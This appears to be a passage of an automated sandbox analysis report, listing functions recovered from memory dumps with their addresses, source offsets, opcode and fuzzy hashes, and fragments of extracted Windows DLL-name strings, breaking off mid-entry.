                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4af94fb01a526c32d41128c50667c2d3c1be15d027298aad871dc58887402e62
                                                                                                                                                                          • Instruction ID: 3f7dc31e6e4c8c7b3fe5f05f8b955587244080ac25e4fc16b2e20d2dad8806b8
                                                                                                                                                                          • Opcode Fuzzy Hash: 4af94fb01a526c32d41128c50667c2d3c1be15d027298aad871dc58887402e62
                                                                                                                                                                          • Instruction Fuzzy Hash: 2CD14638A01205DFCB18CF68D594A6EB7F3BF88314B258569E80ADB351DB34ED46CB90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 000A612F, Relevance: .3, Instructions: 304COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586676877.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3714279d3f042e726e0b79641f2942b81987370c63ebfa87bc7ba8a0d8758638
                                                                                                                                                                          • Instruction ID: 0aa088b19e3cbd8bca9ea1d1b41109d223a3b74e56279ed50714833a8aa3dc5b
                                                                                                                                                                          • Opcode Fuzzy Hash: 3714279d3f042e726e0b79641f2942b81987370c63ebfa87bc7ba8a0d8758638
                                                                                                                                                                          • Instruction Fuzzy Hash: 4CC1CD307006419FCB54DFB5C490B2AB7B2AF86314F59CDACC90A8B6A1DB71ED48CB90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00107FB8, Relevance: .3, Instructions: 302COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586775143.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: dd2aca6fd684716a2d6426b665e682eb354a10c12c4e52de3f1ba861a44e2036
                                                                                                                                                                          • Instruction ID: 40239a9486bc041ff4713838bc0a3fc8d825427fa101de3a8cf2af734c676eca
                                                                                                                                                                          • Opcode Fuzzy Hash: dd2aca6fd684716a2d6426b665e682eb354a10c12c4e52de3f1ba861a44e2036
                                                                                                                                                                          • Instruction Fuzzy Hash: 93C18334E082108FDB04DF68C584AADB7F1BF48324F158599D889AB391DB75DD41CF91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00064A30, Relevance: .3, Instructions: 271COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586610335.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 7940b2abc9e6432c8ff4f1ee52c72e521c7822e65d1b571dd585b36eb2d3a4fa
                                                                                                                                                                          • Instruction ID: c2751151f8dbb85b75b33f600bf17928ff1ce3a5e8039a616b702bbed56ab9f5
                                                                                                                                                                          • Opcode Fuzzy Hash: 7940b2abc9e6432c8ff4f1ee52c72e521c7822e65d1b571dd585b36eb2d3a4fa
                                                                                                                                                                          • Instruction Fuzzy Hash: 85A1AC35A002049FCB45DFB4C894AAABBF7EFC9314B1580A9EA09DB764DB35DD01CB90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00102FE8, Relevance: .2, Instructions: 236COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586775143.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4a1831b0c962dd58a57f0192929079fc69c5643d27c348dcd64fb705667b3a13
                                                                                                                                                                          • Instruction ID: 31c1f6ebb8a0f18756f27b73066baa5dbc1ddbf7c702df543bed56ce0a09a0ba
                                                                                                                                                                          • Opcode Fuzzy Hash: 4a1831b0c962dd58a57f0192929079fc69c5643d27c348dcd64fb705667b3a13
                                                                                                                                                                          • Instruction Fuzzy Hash: 06A14B34E00619DFDB14DF64C894B9DBBB6FF88304F108569E449AB2A1EF74AA85CF50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0012B028, Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586808690.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d6a7a1f57586e0d4eeb61fb0661c5c2c78ed5b3f4e834b28d5bcca188a0805b9
                                                                                                                                                                          • Instruction ID: fcf91344535d9de2c85138e4b830967950578137b351d0690201752fc7565dc6
                                                                                                                                                                          • Opcode Fuzzy Hash: d6a7a1f57586e0d4eeb61fb0661c5c2c78ed5b3f4e834b28d5bcca188a0805b9
                                                                                                                                                                          • Instruction Fuzzy Hash: B1F0BE317052249FCB019B74E819C9E7BAAAFCA26430445AEED04DB320EF34CD1587D5
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0010E9D0, Relevance: 4.1, Strings: 3, Instructions: 340COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586775143.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: c^l$1-0$r.dllext-ms-win-msa-device-l1-1-0
                                                                                                                                                                          • API String ID: 0-1717334623
                                                                                                                                                                          • Opcode ID: 3f19a9645c83f90173cf7cbbaba93c1bb6acb22b21a95c7699be90352639e0e0
                                                                                                                                                                          • Instruction ID: b1a69cc563c249ed14f62ddc95c18a6a8c85c10b48243a5a47079b90ac5c594f
                                                                                                                                                                          • Opcode Fuzzy Hash: 3f19a9645c83f90173cf7cbbaba93c1bb6acb22b21a95c7699be90352639e0e0
                                                                                                                                                                          • Instruction Fuzzy Hash: AED1CF31A046448FCB15DFB8D9549ADBBF2FF89300F14856AD486AB291EB70AD46CB81
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 000AD920, Relevance: 3.8, Strings: 3, Instructions: 92COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586676877.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Hr^l$Hr^l$Hr^l
                                                                                                                                                                          • API String ID: 0-1787430192
                                                                                                                                                                          • Opcode ID: 2d922668c5f97522aa522d3ca1d4895d18d71ccd49438a888ad7e0f152aff061
                                                                                                                                                                          • Instruction ID: e0a2cd5d9a376399430758dca5bbb6c907c6078de8b2bcfda31be22c44aec770
                                                                                                                                                                          • Opcode Fuzzy Hash: 2d922668c5f97522aa522d3ca1d4895d18d71ccd49438a888ad7e0f152aff061
                                                                                                                                                                          • Instruction Fuzzy Hash: D631B2357046518FCB01DB68C8909AE77F1FF8A314B14466EE446DB762EB31DD41CB91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0010ACB8, Relevance: 3.8, Strings: 3, Instructions: 80COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586775143.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Hr^l$Hr^l$Hr^l
                                                                                                                                                                          • API String ID: 0-1787430192
                                                                                                                                                                          • Opcode ID: 90dfc19cc89f08ff83c60398bf7e286afb792a8aaa7703d2ef6a74d6c6f5b678
                                                                                                                                                                          • Instruction ID: 1b31d48786c3620be66fdf34e2ef912020b5ede91a16b9396d130b45ef2ed218
                                                                                                                                                                          • Opcode Fuzzy Hash: 90dfc19cc89f08ff83c60398bf7e286afb792a8aaa7703d2ef6a74d6c6f5b678
                                                                                                                                                                          • Instruction Fuzzy Hash: A221D335B007158FCB04EFA8C4909AE73E6AFD9750B408669D44ADB752EF70ED41CB92
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00125B00, Relevance: 3.0, Strings: 2, Instructions: 485COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586808690.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: tcore-ntuser-dpi-l1-2-0$xP^l
                                                                                                                                                                          • API String ID: 0-2655416787
                                                                                                                                                                          • Opcode ID: 0570050a9bbf6327c51e21ff3798f013c386f1ed44cc0ef468e7570193ee8adc
                                                                                                                                                                          • Instruction ID: b1675fb1804421472db8f7b0f82211b049c01d32bd2b4d63a286e0da7dc55719
                                                                                                                                                                          • Opcode Fuzzy Hash: 0570050a9bbf6327c51e21ff3798f013c386f1ed44cc0ef468e7570193ee8adc
                                                                                                                                                                          • Instruction Fuzzy Hash: 7202C134B042548FCB09DB78C468A6E7BF7AFC9305F15846AD90ADB391DF389D068B91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0006DDC8, Relevance: 2.8, Strings: 2, Instructions: 332COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586610335.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: libraryloader-l2-1-0$ocalization-ansi-l1-1-0
                                                                                                                                                                          • API String ID: 0-1423792451
                                                                                                                                                                          • Opcode ID: cc3fd81dfe72267f4fa353656032a00e4ab63b1de44413ea009dce037ac6b881
                                                                                                                                                                          • Instruction ID: 3947936a31dd2581b1d0b1724682391d8fbf8181938ebed41c154e3dc8572706
                                                                                                                                                                          • Opcode Fuzzy Hash: cc3fd81dfe72267f4fa353656032a00e4ab63b1de44413ea009dce037ac6b881
                                                                                                                                                                          • Instruction Fuzzy Hash: 1BB1E234B053909FCB06DB74C8546AEBBE3AF85310B1580AAD90ACB392DF38DD46C791
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001093D8, Relevance: 2.8, Strings: 2, Instructions: 294COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586775143.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: c^l$rinitext.dll
                                                                                                                                                                          • API String ID: 0-84806234
                                                                                                                                                                          • Opcode ID: 40d1e921a3ae7c8f5058bb3217be52940a35bc34b2f439072e9e573cf5cb5e2a
                                                                                                                                                                          • Instruction ID: 0bc3ed5e69c5bdde48b9e2c9fe3ffd10d05226388dee2e5b1496b51254dff04a
                                                                                                                                                                          • Opcode Fuzzy Hash: 40d1e921a3ae7c8f5058bb3217be52940a35bc34b2f439072e9e573cf5cb5e2a
                                                                                                                                                                          • Instruction Fuzzy Hash: 10B1E331A146448FCB15DFB4C864AAEBBF2AF89300F14856DD446EB3A1EF759C46CB90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 001071B8, Relevance: 2.8, Strings: 2, Instructions: 270COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586775143.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: <^l$ c^l
                                                                                                                                                                          • API String ID: 0-77104094
                                                                                                                                                                          • Opcode ID: 4426f3bb972e723adf86cffaedd97ea877e3a4a85269a6201c5d5a5a62590e07
                                                                                                                                                                          • Instruction ID: 64b15e49783c99490d7b6bbafa48c2c06eff4d3547380d6dcb6012227c83b3cd
                                                                                                                                                                          • Opcode Fuzzy Hash: 4426f3bb972e723adf86cffaedd97ea877e3a4a85269a6201c5d5a5a62590e07
                                                                                                                                                                          • Instruction Fuzzy Hash: D1A1CE31F042048FCB04EF68D8549AEBBB2EF89314F1485A9D845EB391EB71EC45CB90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 000AC2EB, Relevance: 2.7, Strings: 2, Instructions: 234COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          • -globalization-collation-l1-1-0, xrefs: 000AC517
                                                                                                                                                                          • in-gdi-wcs-l1-1-0, xrefs: 000AC4AF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586676877.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: -globalization-collation-l1-1-0$in-gdi-wcs-l1-1-0
                                                                                                                                                                          • API String ID: 0-3418770161
                                                                                                                                                                          • Opcode ID: b3f1b00fd1734e95108af9649f805caafc46b0b61fa1ed388fa940534e2feb17
                                                                                                                                                                          • Instruction ID: 118ee973b1f14f5bf2f59499083d84e31713219086fb738c72521831395ab4df
                                                                                                                                                                          • Opcode Fuzzy Hash: b3f1b00fd1734e95108af9649f805caafc46b0b61fa1ed388fa940534e2feb17
                                                                                                                                                                          • Instruction Fuzzy Hash: 75915074B002159FCB44DF78C494AAEBBF6FF89310B1585A9E94ADB361DB34AC05CB90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00128A69, Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586808690.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 3-1-0$xP^l
                                                                                                                                                                          • API String ID: 0-1724729861
                                                                                                                                                                          • Opcode ID: a47c8e9f7579e1df1a78d6c3c7af23a284fc7e334a14e0ebb1e31f4d2255fde6
                                                                                                                                                                          • Instruction ID: 76be24e2382c38bdddf700537de62325df30f4d51f218b367c0d2c01b5ee5f23
                                                                                                                                                                          • Opcode Fuzzy Hash: a47c8e9f7579e1df1a78d6c3c7af23a284fc7e334a14e0ebb1e31f4d2255fde6
                                                                                                                                                                          • Instruction Fuzzy Hash: F1518E747051548FCB05CF38D854A6ABBF6EF89700B1980AAE906CB3A2DF35DC11CBA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00106178, Relevance: 2.6, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586775143.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: d+^l$d+^l
                                                                                                                                                                          • API String ID: 0-2607282933
                                                                                                                                                                          • Opcode ID: f76cec4385e47386d1ec194c9d6d74a9a56b0ce8151c3d8a146b5f9c1eaf964d
                                                                                                                                                                          • Instruction ID: 450f25a0f0d49436daf23b0285b702f1ff53f8b3e00a2eb0b62f131cf9c37c86
                                                                                                                                                                          • Opcode Fuzzy Hash: f76cec4385e47386d1ec194c9d6d74a9a56b0ce8151c3d8a146b5f9c1eaf964d
                                                                                                                                                                          • Instruction Fuzzy Hash: C0417970601B418FC318DF39C99099ABBF2FF85318724C96DC14A8B661EB72F806CB80
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 000A0F28, Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586676877.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: L1$(
                                                                                                                                                                          • API String ID: 0-2566897698
                                                                                                                                                                          • Opcode ID: 80784cc3201cf6c1f06ddbcc82a219a907cc9650af650d5c84986c1c1d138ebe
                                                                                                                                                                          • Instruction ID: 95e9ab36e55420ff3623d822e13b6a6dfb051130acbb4f43dc9a2568dd273ad0
                                                                                                                                                                          • Opcode Fuzzy Hash: 80784cc3201cf6c1f06ddbcc82a219a907cc9650af650d5c84986c1c1d138ebe
                                                                                                                                                                          • Instruction Fuzzy Hash: 93416F34B002159FDB14DF64D888A6EB7F2FF88310F108568E90AAB355DB79ED85CB91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00109534, Relevance: 2.6, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586775143.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: c^l$rinitext.dll
                                                                                                                                                                          • API String ID: 0-84806234
                                                                                                                                                                          • Opcode ID: 8514da2d8c4eba6f4abdcd06d83c9800ebba7f8539c903a98a000167d65d67d6
                                                                                                                                                                          • Instruction ID: 68e1acad672183974ff44674dbe8be375e560eb9c4a1f5c5c19fad52c372a638
                                                                                                                                                                          • Opcode Fuzzy Hash: 8514da2d8c4eba6f4abdcd06d83c9800ebba7f8539c903a98a000167d65d67d6
                                                                                                                                                                          • Instruction Fuzzy Hash: 32313635B042849FC7059BB8C86466E7FE6AFC9340F0881AEE949CB392EF75CC458791
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 000A3108, Relevance: 2.6, Strings: 2, Instructions: 103COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586676877.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Ll$``
                                                                                                                                                                          • API String ID: 0-390548841
                                                                                                                                                                          • Opcode ID: e2827b37634fca522bd45178defaf5efe8c32fdf9bdd6fecc8e2f5ed0c08b0c9
                                                                                                                                                                          • Instruction ID: 09d651e58ac7a4c9d3f37f954030b89b28b41c70f8d918ca32b1e1bc3981d26b
                                                                                                                                                                          • Opcode Fuzzy Hash: e2827b37634fca522bd45178defaf5efe8c32fdf9bdd6fecc8e2f5ed0c08b0c9
                                                                                                                                                                          • Instruction Fuzzy Hash: EA41AF34205A419FC710DB24E88885AB7A7FFC1228721CE6DD246CB664DF75BD0987E1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0010ACB3, Relevance: 2.6, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586775143.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: Hr^l$Hr^l
                                                                                                                                                                          • API String ID: 0-1010984470
                                                                                                                                                                          • Opcode ID: 30a7080fcb78d1119cdf503001e5750ead3a1af7f0d4abeaeaa8239b09954378
                                                                                                                                                                          • Instruction ID: 615ba0f58b94feb47ba837486d34dfbe3c1ac148bb687d416670a1a089fe337c
                                                                                                                                                                          • Opcode Fuzzy Hash: 30a7080fcb78d1119cdf503001e5750ead3a1af7f0d4abeaeaa8239b09954378
                                                                                                                                                                          • Instruction Fuzzy Hash: 60213630B003158FCB04EFA8C4908EE73A6EFD9310B408629D44A9B752EF70ED01CB92
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 000A1710, Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586676877.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0@
                                                                                                                                                                          • API String ID: 0-1385155363
                                                                                                                                                                          • Opcode ID: 4a680b4a7ee20de68539d74a80ac35f7e1d62d5b93ee22280b9c06f7e92e9ff6
                                                                                                                                                                          • Instruction ID: 3f86ade91e267c85ec1eb49511dab509cf19a1c04c614afaad08b5309c0cc22d
                                                                                                                                                                          • Opcode Fuzzy Hash: 4a680b4a7ee20de68539d74a80ac35f7e1d62d5b93ee22280b9c06f7e92e9ff6
                                                                                                                                                                          • Instruction Fuzzy Hash: 3BD1F535B092108FD755CB68D0A4AAEBBF6EF86360B25816AD809CF351DF35EC42C791
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 000A5D20, Relevance: 1.6, Strings: 1, Instructions: 358COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586676877.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 4P^l
                                                                                                                                                                          • API String ID: 0-1385022451
                                                                                                                                                                          • Opcode ID: 9ae65b7e3c1ec8539b72917c5a9660c42b8741dcc42be9d97dfb4491abcd42be
                                                                                                                                                                          • Instruction ID: be6d3cc93a0ee29b6069036986cc232c01285ba92fd9d27c82efb41e4c9568a5
                                                                                                                                                                          • Opcode Fuzzy Hash: 9ae65b7e3c1ec8539b72917c5a9660c42b8741dcc42be9d97dfb4491abcd42be
                                                                                                                                                                          • Instruction Fuzzy Hash: 92C1F631B053408FCB15CBB8D854AAEBBF2AF8A311F1984AAE445DB351DB349D45CBA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 000A7AA6, Relevance: 1.6, Strings: 1, Instructions: 348COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586676877.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: ap-obsolete-l1-1-0
                                                                                                                                                                          • API String ID: 0-1474628579
                                                                                                                                                                          • Opcode ID: 804ab35b136f96e99c9eb3f49a0b99f2a7a9c0d963677310ef0a088d7116aeda
                                                                                                                                                                          • Instruction ID: e216771b131572cb22f9db2357cffe76cbeaae740968d08d05b7ef3fa815de5c
                                                                                                                                                                          • Opcode Fuzzy Hash: 804ab35b136f96e99c9eb3f49a0b99f2a7a9c0d963677310ef0a088d7116aeda
                                                                                                                                                                          • Instruction Fuzzy Hash: 88D1C030A086458FCB14DF64C8906AEBBF2BF89314F15C9A9C44ADB251DB34AD49CBA0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0010F9D8, Relevance: 1.6, Strings: 1, Instructions: 338COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586775143.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: &|
                                                                                                                                                                          • API String ID: 0-2119969455
                                                                                                                                                                          • Opcode ID: 7131fb5dbc33b8dd9347837307db4b4d286d5a7af9c64a51fc6447dec7598c63
                                                                                                                                                                          • Instruction ID: 33643f1ae079fd84eae18e98b48fcdb607ad6f37760b6e750214e1723d1039b6
                                                                                                                                                                          • Opcode Fuzzy Hash: 7131fb5dbc33b8dd9347837307db4b4d286d5a7af9c64a51fc6447dec7598c63
                                                                                                                                                                          • Instruction Fuzzy Hash: E4C17B34B002048FDB18DF68C495AAAB7F2AF89304F11857DE946DB7A1DB75EC06CB91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0012A208, Relevance: 1.5, Strings: 1, Instructions: 245COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586808690.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0M!
                                                                                                                                                                          • API String ID: 0-2652234905
                                                                                                                                                                          • Opcode ID: faa7eedbd2e784d10c003fc5749a5335f4b3e6098e730bc89ac1133355c695fb
                                                                                                                                                                          • Instruction ID: 15175927a9ec6c3fe80fcfaae135a0b12a90cd35dd609809213ffe5b6faf5c3a
                                                                                                                                                                          • Opcode Fuzzy Hash: faa7eedbd2e784d10c003fc5749a5335f4b3e6098e730bc89ac1133355c695fb
                                                                                                                                                                          • Instruction Fuzzy Hash: 07A1AD366011109FCB05EFA4D8908AD7BB3BFC9314796C99CD10ADB260DF32ED069BA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0012A1F8, Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586808690.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 0M!
                                                                                                                                                                          • API String ID: 0-2652234905
                                                                                                                                                                          • Opcode ID: 4d809475ef3cd1ae2ce5ecf5af3c68c8da6596f1c2b71ace63ac8744fdb2d029
                                                                                                                                                                          • Instruction ID: 0490865def237097ac32d050b75e7ff12a3e9e7162c26e4a05658fddf7152293
                                                                                                                                                                          • Opcode Fuzzy Hash: 4d809475ef3cd1ae2ce5ecf5af3c68c8da6596f1c2b71ace63ac8744fdb2d029
                                                                                                                                                                          • Instruction Fuzzy Hash: 9F919C366111109FCB05DF64E8909AD7BB3FFC9314796C998E14ADB260DF32ED068BA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00107820, Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000F.00000002.586775143.0000000000100000.00000040.00000001.sdmp, Offset: 00100000, based on PE: false
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: c^l
                                                                                                                                                                          • API String ID: 0-2883279090
                                                                                                                                                                          • Opcode ID: b1379702d432ad8941bd3e2f28f9124a6cf894d50b0393ff0037980b6450db7e
                                                                                                                                                                          • Instruction ID: 4b16c0365f35ec9802dfb08d349781d74db6ba2335e55adaf9c53ad461465e4a
